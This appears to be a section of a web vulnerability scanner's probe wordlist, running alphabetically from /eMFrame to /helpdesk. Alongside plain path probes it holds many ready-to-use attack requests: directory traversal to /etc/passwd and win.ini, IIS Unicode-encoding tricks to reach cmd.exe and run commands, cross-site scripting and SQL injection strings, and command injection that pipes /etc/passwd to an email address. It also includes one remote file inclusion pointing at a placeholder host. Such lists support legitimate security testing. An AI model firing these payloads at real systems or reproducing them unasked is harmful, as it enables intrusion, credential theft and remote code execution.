/eMFrame/webacc?taskId=fw.Authenticate&merge=fw.FinishLogin&error=fw.AuthFail&User.lang=en&User.interface=browser&User.context=jjosYlghqsCu&AuthenticateName=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA&AuthenticatePassword=bleh&AuthenticateContext=&AuthenticateTree=
/employees
/employees/
/empower?DB=whateverwhatever
/empris/
/empris/INSTALL
/emumail.cgi
/emumail.cgi?type=.%00
/emumail.cgi?type=..%00
/emumail.cgi?type=../../../../../../../../../../etc/passwd%00
/emumail/emumail.cgi?type=../../../../../../../../../../../../../../etc/passwd%00
/en/
/eng/
/engine/js/FCKeditor/editor/filemanager/browser/default/connectors/php/connector.php?Command=FileUpload&Type=File&CurrentFolder=%2f
/english/
/enivron.pl
/enter.cgi
/enter_bug.cgi
/entete.php
/enteteacceuil.php
/entry/
/entry_rightpanel.pl
/env-cgi
/env.cgi
/env.log
/env.pl
/envcgi
/envia/
/enviamail/
/environ-cgi
/environ.cgi
/environ.pl
/environ.pl+%00
/environcgi
/envivo101/default.asp?action=search&searchstring='
/en_US/
/epoch
/epoch/
/epoch/add-passwd.cgi
/epoch/custom.pl
/epochpassword
/epochpwd
/epwd/
/erba/start/%3Cscript%3Ealert(document.domain);%3C/script%3E
/err.log
/error.log
/error.php
/Error.php?app_strings%5BNTC_CLICK_BACK%5D=%3Cscript%3Ealert%28xss%29%3C%2Fscript%3E
/error/
/error/%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cautoexec.bat
/error/%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cboot.ini
/error/%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cwindows%5cwin.ini
/error/%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cwinnt%5cwin.ini
/error/%5c%2e%2e%5cmanual%5cstopping.html
/error/500error.jsp
/error/500error.jsp?et=1
/error/500error.jsp?et=1<script>alert('CSS')</script>
/error/500error.jsp?et=1<script>alert('vulnerable')</script>
/error/HTTP_NOT_FOUND.html.var
/error/\..\..\..\..\winnt\win.ini
/ErrorReporter/
/errors
/errors.log
/errors/
/errors/needinit.php?GALLERY_BASEDIR=http://xxxxxxxx/
/errors/rights.asp?awReadAccessRight=True&msg=%3Cscript%3Ealert%28xss%29%3C%2Fscript%3E
/errors_log
/error_log
/error_log/
/es/
/esales/
/eshop.pl/seite=;cat%20eshop.pl|
/eshop.pl?seite=;ls|
/estore/
/esupport/
/esupport/index.php?_a=knowledgebase&_j=rate&_i='&type=no
/esupport/Index.php?_a=tickets&_m=viewmain&email22=blah@blah&ticketkey22='
/etc
/etc/
/etc/passwd
/ets_app_process.asp
/eupload/
/eUpload/password.txt
/event.nsf
/eventdisplay.php?id=-999%20UNION%20SELECT%20111222,222,333111
/events.nsf
/events.php?link_date=22007-02-17
/events/calview/week.php?cal=&getdate=%22%3E%3Cscript%3Ealert%2810290%29%3C%2Fscript%3E
/events4.nsf
/events4.nsf/?OpenDatabase
/events5.nsf
/everythingform.cgi
/everythingform.cgi?config=../../../../../../../../bin/ping&Name=xx&e-mail=test@test.com
/evsearch.php
/ewebquiz.asp?QuizID=1%20or%201=1
/ews/
/ews/architext_query.pl
/ews/ews/architext_query.pl
/ex-logger.pl
/ex/jsp/simple.jsp.
/Exadmin/
/exair/
/exair/howitworks/Code.asp
/example
/example%2ejsp
/example.jsp%81
/example.jsp..
/example.jsp../
/example/
/example/SnoopServlet
/exampleapp/docs/sourcewindow.cfm
/examples
/examples/
/examples//WEB-INF/
/examples/applications/bboard/bboard_frames.html
/examples/basic/servlet/HelloServlet
/Examples/FileLibrary/addFile
/examples/jsp/cal/cal2.jsp?time=8am%3cscript%3ealert(xss)%3c%2fscript%3e
/examples/jsp/index.html
/examples/jsp/num/numguess.js%70
/examples/jsp/snp/anything.snp
/examples/jsp/snp/sno.snp
/examples/jsp/snp/snoop.jsp
/examples/jsp/source.jsp
/examples/jsp/source.jsp?/jsp/
/examples/jsp/source.jsp??
/examples/SendMailServlet
/examples/servlet/AUX
/examples/servlet/SnoopServlet
/examples/servlet/TroubleShooter
/examples/servlets/index.html
/Examples/ShoppingCart/addItems?orders.id%3Arecords=510-007&orders.quantity%3Arecords=&orders.id%3Arecords=510-122&orders.quantity%3Arecords=0&orders.id%3Arecords=510-115&orders.quantity%3Arecords=0
/examples/view_source.jsp?\..\..\..\..\..\..\..\..\..\..\..\..\boot.ini
/examples/web-inf/
/examplesWebApp/
/Excel
/excel/
/Exchange
/exchange/
/exchange/..%%35%63../..%%35%63../..%%35%63../winnt/system32/cmd.exe?/c+dir
/exchange/..%%35c../..%%35c../..%%35c../winnt/system32/cmd.exe?/c+dir
/exchange/..%255c..%255c..%255c..%255c..%255c../winnt/system32/cmd.exe?/c+dir+c:\
/exchange/..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir
/exchange/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
/exchange/..%c0%2f../..%c0%2f../..%c0%2f../winnt/system32/cmd.exe?/c+dir
/exchange/..%c0%ae%c0%ae/%c0%ae%c0%ae/winnt/system32/cmd.exe?/c+dir
/exchange/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir
/exchange/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir
/exchange/..%c1%9c../..%c1%9c../..%c1%9c../winnt/system32/cmd.exe?/c+dir
/exchange/..%e0%80%af../winnt/system32/cmd.exe?/c+dir
/exchange/..%f0%80%80%af../winnt/system32/cmd.exe?/c+dir
/exchange/..%f8%80%80%80%af../winnt/system32/cmd.exe?/c+dir
/exchange/..%fc%80%80%80%80%af../winnt/system32/cmd.exe?/c+dir
/exchange/check.bat/..%c0%2f..%c0%2f..%c0%2fwinnt/system32/cmd.exe?/c+dir
/exchange/check.bat/..%c0%af..%c0%af..%c0%afwinnt/system32/cmd.exe?/c+dir
/exchange/check.bat/..%c1%1c..%c1%1c..%c1%1cwinnt/system32/cmd.exe?/c+dir
/exchange/check.bat/..%C1%9C..%C1%9C..%C1%9Cwinnt/system32/cmd.exe?/c+dir
/exchange/finduser/fumsg.asp
/exchange/forms/ipm/note/cmpTitle.asp?tab=%22%2Balert%28824%29%3B%7D%20setImportance%281%29%3B%3C%2Fscript%3E&att=0&imp=1
/exchange/lib/AMPROPS.INC
/exchange/lib/ATTACH.INC
/exchange/lib/DELETE.INC
/exchange/lib/GETREND.INC
/exchange/lib/GETWHEN.INC
/exchange/lib/JSATTACH.INC
/exchange/lib/JSROOT.INC
/exchange/lib/JSUTIL.INC
/exchange/lib/LANG.INC
/exchange/lib/logon.inc
/exchange/lib/PAGEUTIL.INC
/exchange/lib/PUBFLD.INC
/exchange/lib/RENDER.INC
/exchange/lib/SESSION.INC
/exchange/logonfrm.asp
/exchange/root.asp?acs=anon
/ExchWeb/
/excite
/excite/
/excite;IFS="$";/bin/cat%20/etc/passwd|mail%20test@test.com
/exe/
/exec.php?action=comment_add&entryid=force_error
/exec/
/exec/show/config/cr
/executable/
/executables/
/executor.cgi
/Exoops/class/debug/highlight.php?file=highlight.php&line=1
/expeval
/expeval/
/exploits/
/explorer/
/expo/sdk/blanks/file_modules.php
/expo/sdk/blanks/formcontrol.php
/expo/subsystems/permissions.info.php
/expo/subsystems/search.info.php
/expo/subsystems/security.info.php
/export
/export.php?what=../../../../../../etc/passwd%00
/export/
/ext.dll
/ext.dll%00
/ext.dll?MfcIsapiCommand=LoadPage&page=admin.hts%20&a0=add&a1=root&a2=%5C
/ext.dll?MfcISAPICommand=LoadPage&page=doc.htx&a0=/,,,/path99/doesnotexist.doc&a1=_&a2=2048&a3=8&a4=1
/ext.dll?MfcISAPICommand=LoadPage&page=search.htx&a0=%22%3E%3Cscript%3Ealert%28%27CSS%27%29%3B%3C%2Fscript%3E&a1=0&a2=1&a3=6
/ext.dll?mfcisapicommand=loadpage&page=upload.htx
/ext.ini
/ext.ini.% 00.txt
/ext.ini.%00.txt
/external/
/extra/
/extranet/
/extras/
/Extropia/web_store.cgi?page=../../../../../../../../../../etc/passwd%00.html
/ezadmin.cgi
/ezguestbook/datastores/guestbook.mdb
/ezhttpbench.php3
/ezhttpbench.php3?AnalyseSite=/etc/passwd&NumLoops=1
/ezhttpbench.php?AnalyseSite=/etc/passwd&NumLoops=1
/ezman.cgi
/ezmlm-cgi
/ezshopper/search.cgi?user_id=id&database=dbase1.exm&template=../../../../../../../etc/passwd&distinct=1
/ezshopper2/loadpage.cgi?id+/
/ezshopper3/loadpage.cgi?user_id=id&file=/
/f/
/f3f9600d8aa5614ec8fdf47de1554b32
/failure.asp?err_txt=text%3C/b%3E%3Cscript%3Ealert(%22xss%22);%3C/script%3E%3Cb%3Etext
/familynews.php?getnews=-9999%27
/faq.php?cat_id=1%27%20or%20force_mysql_error%3D%272
/faq.php?farea=%22%3E%3Cscript%3Ealert(xss)%3C/script%3E
/faq/
/faq/index.php?find=%3Cscript%3Ealert%28974%29%3C/script%3E&search=Search
/faq/index.php?x=f&id='
/faqmanager.cgi?toc=/etc/passwd%00
/faqs/
/faq_english.php?Cat=%3Cscript%3Ealert%28xss%29%3C%2Fscript%3E
/favicon.ico
/favorites/add_bookmark.php
/favorites/apb_common.php
/favorites/apb_view_class.php
/favorites/templates/head.php
/faxsurvey
/faxsurvey?/bin/cat%20/etc/passwd
/faxsurvey?cat%20/etc/passwd
/fbsd/
/fcgi-bin/
/fcgi-bin/echo
/fcgi-bin/echo.exe
/fcgi-bin/echo.exe?foo=
/fcgi-bin/echo2
/fcgi-bin/echo2.exe?foo=
/fckeditor/editor/filemanager/browser/mcpuk/connectors/php/connector.php?Command=FileUpload&Type=File
/features/
/feedback
/feedback.htm
/feedback.txt
/feedback/
/fetch.php
/fexplore.exe
/file
/file-that-is-not-real-2002.php3
/file.php?id=-1%27
/file/
/file/../../../../../../../../../../../../../../etc/
/file/../../../../../../../../etc/
/file/index.jsp
/fileadmin/
/filedetails.php?path=%3C%2Ftitle%3E%3Cscript%3Ealert(xss)%3C/script%3E
/filelist.php?op=view&ticon=&ttitle=&tcontent=admin/../../../../../../../../../../../
/filemail
/filemail.pl
/filemanager/
/filemanager/filemanager.php?cmd=chdir&file=/../../../../../../../..
/filemanager/filemanager_forms.php
/filemanager/source.php?../../../../../../etc/passwd
/filemanager/source.php?../../../../etc/passwd
/filemgmt/
/filemgmt/brokenfile.php?lid=17'/%22%3<script>alert(document.cookie)</script>
/files
/files.php?new_language=elvish&mode=select
/files.pl
/files/
/files/passwd.txt
/fileseek.cgi?head=;id|
/fileseek.cgi?head=head.htm&foot=;id|
/filez/
/file_upload.pl
/films/
/final/
/finance.xls
/finances.xls
/find.php?act=action&reset=yes&detail%5B%5D='
/find.php?page=0&act=action&orderby=%27
/find.php?page=0&act=action&orderby=sortorder&orderdir=%27
/find/
/finger
/finger.cgi
/finger.pl
/finger.pl?ADDR=|id|
/finger?@localhost
/firefox/
/flexform
/flexform.cgi
/flexform.pl
/flex_html_wrapper.html#<script>alert(xss)</script>
/foldoc
/foldoc/
/foldoc/template.cgi
/foldoc/template.cgi?template.cgi
/fom.cgi?cmd=recent&file=1&showLastModified=show&_submit=Show%2Bdocuments&_duration=%3Cscript%3Ealert%28xss%29%3C%2Fscript%3E
/fom.cgi?file=%3Cscript%3Ealert%28xss%29%3C%2Fscript%3E&showLastModified=show
/fom.cgi?_insert=answer&cmd=%3Cscript%3Ealert%28xss%29%3C%2Fscript%3E&file=1
/foo.cmd?xxx&dir
/foo.gif?sap-isc-key=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
/foo.php3
/foo/
/foo?SCRIPT_NAME=/../../../../../../../../boot.ini
/foo?SCRIPT_NAME=/../../../../../../../etc/passwd
/food/
/footer.inc.php?la_pow_by=%3Cscript%3Ealert%28xss%29%3C%2Fscript%3E
/footer.inc.php?la_pow_by=%3Cscript%3Ealert(xss)%3C/script%3E
/footer/
/footers/
/forgot.php
/forgotPassword.asp?txtEmailAddress=%3Cscript%3Ealert%28xss%29%3C%2Fscript%3E
/form-to-mail.cgi?_out_file=mungo.dat&x=y
/form-totaller
/Form-totaller%20version
/form-totaller/
/form-totaller/form-totaller.cgi
/form-totaller/form-totaller.cgi?_response_top=top.html&_response_data=/etc/passwd&_response_bottom=bottom.html&_divide_by=4
/form.cgi
/form.pl
/form/
/formhandler/formhandler.cgi
/formmail
/FormMail.cgi
/formmail.cgi?<script>alert("XSS");</script>
/formmail.cgi?env_report=/etc/passwd&recipient=email@host.com&required=&firstname=&lastname=&email=&message=&Submit=hi
/formmail.cgi?recipient=root@localhost%0Acat%20/etc/passwd&email=nessus@localhost&subject=test
/formmail.php
/FormMail.pl
/formmail.pl?recipient=root@localhost%0Acat%20/etc/passwd&email=nessus@localhost&subject=test
/formmail?recipient=root@localhost%0Acat%20/etc/passwd&email=nessus@localhost&subject=test
/formnow.cgi
/formprocessor.asp?MailTo=test@test.com&MailFrom=test@test.net&Message=tst&MailTemplate1=/cgi-bin/formprocessor.asp
/FormReflectingURLValue?OpenForm&Field=%5B%3Cscript%3E%2E%2E%2E%2E%2E%3C%2Fscript%3E%5D
/forms/
/formsmgr/
/formsmgr/storage/storage.txt
/formto.pl
/formvar.exe
/form_results.txt
/forte/cgi_bin/fortecgi.dat
/forte/examples/
/forte/examples/easyweb/easyweb.htm
/forte/examples/softwear/docs/homepage.htm
/forte/examples/sqldemo/sqldemo.htm
/forte/fortecgi.dat
/forte/WEB.VER
/fortune
/forum
/forum-admin.pl
/forum.asp?forum='
/forum.asp?FORUM_ID=1&ARCHIVE=true&sortfield=lastpost&sortorder=%22%3E%3Cscript%3Efunction+xss%28%29%7Balert%28xss%29%3B%7D%3C%2Fscript%3E%3Cbody+onload%3D%22xss%28%29%22%3E
/forum.ghp
/forum.php?channel=0%20union%20select%20*%20from%20force_mysql_table_error
/forum.php?date_show=%22%2F%3E%3Cscript%3Ealert%2810326%29%3C%2Fscript%3E
/forum.php?forum=-1%20union%20select%20password,password,null,null%20from%20test_mysql_injection%20where%20uid=1/*
/forum.php?forum_id=%22%3E%3Cscript%3Ealert%28xss%29%3C%2Fscript%3E&category_id=1
/forum.php?msg=%27
/forum.php?msg=2'force_mysql_num_rows_warning
/forum.php?open=%22%2F%3E%3Cscript%3Ealert%2810324%29%3C%2Fscript%3E
/forum.pl
/forum/
/forum/action.php
/forum/add.php
/forum/admin/database/wwForum.mdb
/forum/admin/wwforum.mdb
/forum/bb_smilies.php?user=MToxOjE6MToxOjE6MToxOjE6Li4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAK
/forum/common.php
/forum/database/philboard.mdb
/forum/forums/forum.asp?forumid=1&page=0'
/forum/include/common/comfinish.cfm?FTRESULT.errorcode=0&FTVAR_SCRIPTRUN=alert%28xss%29
/forum/include/error/autherror.cfm?errorcode=1&FTVAR_LINKP=%22%3E%3C%2Fa%3E%3Cscript%3Ealert%28xss%29%3C%2Fscript%3E%3Ca+href%3D%22
/forum/include/error/autherror.cfm?errorcode=1&FTVAR_URLP=%22%3E%3Cscript%3Ealert%28xss%29%3C%2Fscript%3E
/forum/include/error/autherror.cfm?FTVAR_URLP=x&errorcode=%27
/forum/index.php?act=Post&CODE=02&f=4&t=3&qpid='
/forum/index.php?automodule=blog&blogid=14&cmd=showentry&eid=4'
/forum/index.php?limit='
/forum/join.cfm
/forum/list.php3
/forum/memberlist.php?s=23c37cf1af5d2ad05f49361b0407ad9e&what=\
/forum/misc.php?action=search&restrict=<body%20onload=alert(document.cookie);>
/forum/misc.php?action=search&restrict=private='
/forum/newreply.php
/forum/phpinfo.php?foobar=<script>alert(document.cookie);</script>
/forum/pop_up_ip_blocking.asp?laryCheckedIPAddrID='
/forum/pop_up_member_search.asp
/forum/privmsg.php
/forum/register.php
/forum/stats.php?action=view&latest="></textarea><body%20onload=alert(document.cookie);>
/forum/stats.php?action=view&replymost="></textarea><body%20onload=alert(document.cookie);>
/forum/stats.php?action=view&viewmost="></textarea><body%20onload=alert(document.cookie);>
/forum/today.php?restrict=<body%20onload=alert(document.cookie);>
/forum/ubb_library.pl
/forum/users.php?mode=viewprofile&viewuser_id='
/forum/viewforum.php?forum='
/forum/viewforum.php?forum_id=1&lastvisited=%27
/forum/viewforum.php?id=123456&postorder=%22%3E%3Cscript%3Ealert%28956%29%3C/script%3E%3C
/forum/viewforum.php?id=123456789123456789
/forum/viewforum.php?id=t=123456&postorder=%22%3E%3Cscript%3Ealert%28958%29%3C/script%3E%3C
/forum/viewforum.php?mode=view&id='
/forum/viewtopic.php
/forum/viewtopic.php?id=%3Cscript%3Ealert(document.cookie)%3C%2Fscript%3E&t_id=2
/forum/xmb.php?show=version&xmbuser=foobar><body%20onload=alert(document.cookie);>
/forum/YaBB.pl?board=news&action=display&num=../../../../../../../../../../etc/passwd%00
/forum/z_user_show.php?method=showuserlink&class=<Script>javascript:alert(document.cookie)</Script>&rollid=admin&x=3da59a9da8825&
/forumdisplay.cgi
/forumdisplay.php?fid=1&GLOBALS%5B%5D=1&modlist=%3Cscript%3Ealert%28xss%29%3C%2Fscript%3E
/forumdisplay.php?fid=1&GLOBALS%5B%5D=1&onlinemembers=%3Cscript%3Ealert%28xss%29%3C%2Fscript%3E
/forumdisplay.php?fid=2&GLOBALS%5B%5D=1&announcements=%3Cscript%3Ealert%28xss%29%3C%2Fscript%3E
/forumdisplay.php?fid=2&sortby=%27
/forumdisplay.php?fid=2&sortby=%27%5D%3Bphpinfo%28%29%3Bexit%3B%2F%2F
/forumfolder/activate.php?uid=11&ac=0
/forums.php
/forums.php?cat_id=%27
/forums.php?filter=forums%2Ephp%3Fc%3Dskin&x='
/forums.php?m=topics&s='
/forums/
/forums/browse.php
/forums/browse.php?fid=3&tid=46&go=
/forums/browse.php?fid=3&tid=46&go=<script>JavaScript:alert
/forums/dcboard.cgi
/forums/index.php?act=Members&max_results=30&filter=1&sort_order=asc&sort_key=name&st='
/forums/index.php?act=reputation&fid=5&pid=%27
/forums/index.php?board=;action=login2&user=USERNAME&cookielength=120&passwrd=PASSWORD
/forums/join.cfm
/forums/list.php?f=DESIRED_PHP_FILE_WITHOUT_EXTENSION
/forums/newreply.php
/forums/YaBB.pl?board=news&action=display&num=../../../../../../../../../../etc/passwd%00
/ForumTopicDetails.php?TopicID=11111111%20union%20Select%20*%20from%20EronatedInexistentTable
/forward/
/forwarder=&forwarder=%0d%0a%0d%0a%3Chtml%3EHELLO
/forwards/
/forwrite/
/foto/
/fotos/
/foxweb.dll
/Fpadmcgi.exe
/fpadmdll.dll
/fpadmin
/fpadmin.htm
/fpadmin/
/fpcount.exe
/fpdb/
/fpdb/shop.mdb
/fpexplore.exe
/fpremadm.exe
/fpsample/
/fpsample/..%%35%63../..%%35%63../..%%35%63../winnt/system32/cmd.exe?/c+dir
/fpsample/..%%35c../..%%35c../..%%35c../winnt/system32/cmd.exe?/c+dir
/fpsample/..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir
/fpsample/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
/fpsample/..%c0%ae%c0%ae/%c0%ae%c0%ae/winnt/system32/cmd.exe?/c+dir
/fpsample/..%e0%80%af../winnt/system32/cmd.exe?/c+dir
/fpsample/..%f0%80%80%af../winnt/system32/cmd.exe?/c+dir
/fpsample/..%f8%80%80%80%af../winnt/system32/cmd.exe?/c+dir
/fpsample/..%fc%80%80%80%80%af../winnt/system32/cmd.exe?/c+dir
/fpsrvadm.exe
/fr/
/framesets/
/free/
/freepic/
/freepics/
/friend.php?op=FriendSend&sid=-1%27
/friend.php?op=SiteSent&fname=
/friend.php?op=SiteSent&fname=<script>alert('vulnerable')</script>
/friend.php?op=SiteSent&fname=<script>alert(document.cookie)</script>
/front/
/frontend/
/frontend/files/seldir.html?dir=%3Cscript%3Ealert%28xss%29%3C%2Fscript%3E
/frontend/htaccess/newuser.html?user=%3Cscript%3Ealert%28xss%29%3C%2Fscript%3E&pass=&dir=%3Cscript%3Ealert%28xss%29%3C%2Fscript%3E
/frontend/x/files/editit.html?dir=%2F&file=%3Cimg+src%3D%22javascript%3Aalert%28xss%29%22%3E
/frontend/x/files/select.html?dir=%2F&file=%3CIMG+src%3D%22javascript%3Aalert%28xss%29%3B%22%3E
/frontend/x/files/showfile.html?dir=%2F&file=%3Cimg+src%3D%22javascript%3Aalert%28xss%29%22%3E
/frontend/x/htaccess/dohtaccess.html?dir=%3Cimg+src%3D%22javascript%3Aalert%28xss%29%22%3E
/frontend/x/mail/addhandle.html?ext=phpz&handle=<script>alert(document.cookie)</script>
/frontend/x/mail/dodelautores.html?email=<script>alert(document.cookie)</script>
/frontend/x/manpage.html?%3Cscript%3Ealert%2810460%29%3C%2Fscript%3E
/frontend/x/net/dnslook.html?dns=%3Cscript%3Ealert%28xss%29%3C%2Fscript%3E
/froogle/setup.php?option=step2
/fruity_sub.pl
/ftp
/ftp.cgi
/ftp.log
/ftp.pl?dir=../../../../../../
/ftp/
/ftp/ftp.pl?dir=../../../../../../etc/passwd
/ftpcgi
/ftpdiag.cgi
/ftplogin/?login=%22%3E%3Cscript%3Ealert%28xss%29%3C%2Fscript%3E
/ftproot/
/ftp_index.php?path=%3Cscript%3Ealert%28xss%29%3C%2Fscript%3E
/ftp_users.php?plan_id=%27
/ftp_users.php?plan_id=35&domain=%27
/ftrace.log
/fuck.exe
/fuck/
/fucks/
/fullnews.php?id=<script>alert(document.cookie)</script>
/fun/
/functions.inc
/functions.php?clang=../../../etc/passwd
/functions/
/fusetalk/join.cfm
/futureforum.cgi
/futureforum3.cgi
/fwd/
/fx/
/g/
/gal/
/galleries/
/gallery.php
/gallery.php?action=viewImage&image_id=%27
/gallery.php?album=%27
/gallery.php?album=%3Cscript%3Ealert%2810310%29%3C%2Fscript%3E
/gallery.php?gid=-9696%27
/gallery/
/gallery/captionator.php
/gallery/Database/listpics.mdb
/gallery/folderview.asp?folder=%3Cscript%3Ealert%28xss%29%3C%2Fscript%3E
/gallery/folderview.asp?folder=./../../../../../../../../winnt/repair
/gallery/folderview.asp?folder=Sport+Champions/../../../../../../../../
/gallery/index.php
/gallery/login.asp
/gallery/publish_xp_docs.php
/gallery2/main.php?g2_itemId=/../../../../../../../boot.ini%00
/gallery2/main.php?g2_itemId=/../../../../../../../etc/passwd%00
/galls/
/game/
/games/
/gamez/
/garden/
/gb/
/gb/index.php?login=true
/gb/xGB.php?act=admin&do=edit
/gbcms_php_files/up_loader.php
/gbook.cgi?_MAILTO=xx;ls
/gbook.php?page=<script>alert('CSS')</script>
/gbook/
/gbook/gbook.cgi
/gbpro/top.php?header=../../../../../../../../../../../../../etc/passwd
/geeklog/getimage.php?mode=show&image=.%2F%3CIMG+SRC%3D%27JaVaScRiPt%3Aalert%28xss%29%27%3E
/geeklog/getimage.php?mode=show&image=dd
/geeklog/layout/professional/functions.php
/general.chl+
/general/
/general/sendpassword.php?action=send
/generate.cgi
/generate.cgi?content=../../../../../../../../../../etc/passwd%00board=board_1
/generate.cgi?content=../../../../../../../../../../windows/win.ini%00board=board_1
/generate.cgi?content=../../../../../../../../../../winnt/win.ini%00board=board_1
/gen_m3u.php?phpbb_root_path=/../../../../../../../../boot.ini%00
/gen_m3u.php?phpbb_root_path=/../../../../../../../../etc/passwd%00
/gen_m3u.php?phpbb_root_path=/../../../../../../../../winnt/win.ini%00
/get.php?catid='
/get.php?username=%3Cbr%3E%3Cb%3Eforce_xss_for_test%3C/b%3E%3Cbr%3E
/get/
/get16.exe
/get32.exe
/getaccess
/getcomments.pl
/getdoc.cgi
/getdrvrs.exe
/getFile.cfm
/getfile.php?cat=%27
/getnewsitem.php?newsid=999/**/UNION/**/SELECT/**/1,1122334455,5544332211,135,2/*
/gettext.pl
/get_od_toc.pl
/get_od_toc.pl?Profile=
/get_password.php/%3e%22%3e%3cScRiP%3ealert(xss)%3c/ScRiPt%3e
/gfx/
/gH.cgi
/girl/
/girls/
/girlz/
/glba/
/glimpse
/global
/global.-old
/global.000
/global.1st
/global.arc
/global.asa
/global.asa%20.pl
/global.asa%3F+.htr
/global.asa+.htr
/global.asa.-old
/global.asa.000
/global.asa.1st
/global.asa.bac
/global.asa.backup
/global.asa.bak
/global.asa.bakup
/global.asa.old
/global.asa.orig
/global.asa.temp
/global.asa.tmp
/global.asa.~1
/global.asa.~bk
/global.asa::$DATA
/Global.asax
/global.asax+.htr
/Global.asax.bak
/Global.asax.bakup
/global.asax.cs
/Global.asax.old
/Global.asax.orig
/Global.asax.temp
/Global.asax.tmp
/global.asax\
/global.asa\
/global.bac
/global.backup
/global.bak
/global.inc
/global.old
/global.orig
/global.php?bbclosedwarning=%3Cscript%3Ealert%28xss%29%3C%2Fscript%3E
/global.php?templatesused=%27
/global.rar
/global.temp
/global.tmp
/global.~bk
/global/
/globalaccounts/
/globals
/globals.jsa
/globals.php3?LangCookie=XXnonexistentXX
/global~1
/GLObill/
/glossary/
/gm.cgi
/gnujsp/[dirname]/[file]
/go.php?url=php%3A%2F%2Ffilter%2Fresource%3Dfile%3A%2F%2F%2F%2Fetc%2Fpasswd%2500&untrusted=1
/go.php?url=phplter/resource=filent\win.ini%00&untrusted=1
/go.php?url=phplter/resource=filet.ini%00&untrusted=1
/goform/
/goform/CheckLogin?login=root&password=tslinux
/gold/
/gotopage.cgi?13686+/../../../../../../../../../../../../../../../../etc/passwd
/grap.php
/graph.php?local_graph_id=1
/graph.php?local_graph_id=1&rra_id=34&action=properties&view_type=token%27%3E%3Cscript%3Ealert%2810378%29%3C%2Fscript%3E
/graph/
/graphic/
/graphics/
/graphics/sml3com
/graphics/sml3com%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s
/graphs/
/graph_view.php?action=list&page=1&host_id=0&graph_template_id=8&filter=onmouseover%3Djavascript%3Aalert%2810380%29
/grocery/
/group.nsf
/group.nsf/?OpenDatabase
/group/
/groupcp.php
/groupcp.php?mode%5B%5D=
/groups.nsf
/groups.nsf/?OpenDatabase
/groups/
/GroupView.php?GroupID='
/guest.cgi
/guest.htm
/guest/
/guestadd.pl
/guestbook
/guestbook-cgi
/guestbook.cgi
/guestbook.pl
/guestbook/
/guestbook/admin.php
/guestbook/admin/o12guest.mdb
/guestbook/dcguest.cgi
/guestbook/demo.php
/guestbookcgi
/guests
/guests/
/guestserver.cgi?email=|ls|test@test.com
/guestserver/guestserver.cgi?email=|ls|test@test.com
/guest_i.htm
/gui/
/guide/
/gw5/
/GW5/GWWEB.EXE?HELP=../../../../../index
/GW5/GWWEB.EXE?HELP=bad-request
/GW5/GWWEB.EXE?HELP=somewhereovertherainbow
/GW5/US/GWWEB.EXE?HELP=somewhereovertherainbow
/gwweb.exe
/GWWEB.EXE?HELP=bad-request
/GXApp/
/h/
/h1/
/hamweather/
/handler
/handler%20SH
/handler/useless_****;ls%20-lFa%20/etc|?data=Download
/handler/useless_thing;ls%20-lFa%20/etc|?data=Download
/hardcore/
/HB/
/hc/hc?d=mes&x=20433&ntb=12345
/hd/windows/win.ini
/hd/winnt/system32/cmd.exe?/c+echo+hello
/hd/winnt/win.ini
/head/
/header.inc.php?site_name=%3C%2Ftitle%3E%3Cscript%3Ealert%28xss%29%3C%2Fscript%3E
/header.php?header.php
/header/
/headers/
/headeruserdata.php?groupname=%27
/headeruserdata.php?groupname='generate%20sql%20error405177102589
/hello.bat?&dir+c:\
/help
/help.php?chapter=
/help.php?LANG%5BDEFAULT_BRANDING%5D=%3Cscript%3Ealert%28xss%29%3C%2Fscript%3E
/help/
/help/contents.htm
/help/decsdoc.nsf/?OpenDatabase
/help/dols_help.nsf/?OpenDatabase
/help/domguide.nsf
/help/dspug.nsf
/help/help4.nsf
/help/help5_admin.nsf
/help/help5_admin.nsf/?OpenDatabase
/help/help5_client.nsf
/help/help5_client.nsf/?OpenDatabase
/help/help5_designer.nsf
/help/help5_designer.nsf/?OpenDatabase
/help/helpadmin.nsf
/help/helplt4.nsf
/help/home.html
/help/internet.nsf
/help/javapg.nsf
/help/lccon.nsf
/help/lccon.nsf/?OpenDatabase
/help/lsxlc.nsf/?OpenDatabase
/help/migrate.nsf
/help/npn_admn.nsf
/help/npn_rn.nsf
/help/readmec.nsf
/help/readmes.nsf
/help/smhelp.nsf
/help/srvinst.nsf
/help4.nsf
/help4.nsf/?OpenDatabase
/help5_admin.nsf
/help5_client.nsf
/help5_designer.nsf
/helpadmin.nsf
/helpdesk/
/helpdesk/createContact.asp
/helpdesk/install.php
